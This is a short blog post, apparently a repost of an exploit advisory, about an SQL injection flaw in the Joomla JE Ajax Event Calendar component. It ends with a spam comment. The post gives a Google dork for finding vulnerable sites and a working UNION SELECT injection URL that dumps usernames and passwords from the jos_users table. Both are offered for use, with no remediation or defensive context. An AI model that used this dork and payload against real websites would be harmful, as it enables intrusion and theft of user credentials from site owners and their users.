# Vendor:
http://joomlaextensions.co.in/extensions/components/je-ajax-event-calender.html
 
# Download:
http://extensions.joomla.org/extensions/calendars-a-events/events/events-calendars/12110
 
# Author: altbta
 
# Contact: l_9[at]Hotmail[Dot]com
 
# Home: http://xp10.com
 
# Thanks to: rxh  xp10.com >> v4-team.com >> p0c.cc :))
 
==========================================================================
 
[+] Dork: inurl:"index.php?option=com_jeajaxeventcalendar"
 
==========================================================================
 
[+] exploit:
http://127.168.1.1/index.php?option=com_jeajaxeventcalendar&view=alleventlist_more&event_id=-13/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4/**/from/**/jos_users--
Friday, November 26, 2010
Joomla JE Ajax Event Calendar Component (com_jeajaxeventcalendar) SQL Injection
1About Me
- За Zer0-0ne
 - Блог за истражување и развој на информациска безбедност, кој е наменет за постирање на најнови ранливости и слабости. Founder darknessn1k0!4
 
1 comments:
Thanks for the link you provided,it's very helpful to know about joomla event calendar.
I refer you to visit this website for joomla extension:
http://www.apptha.com/joomla/apptha-eventz
Post a Comment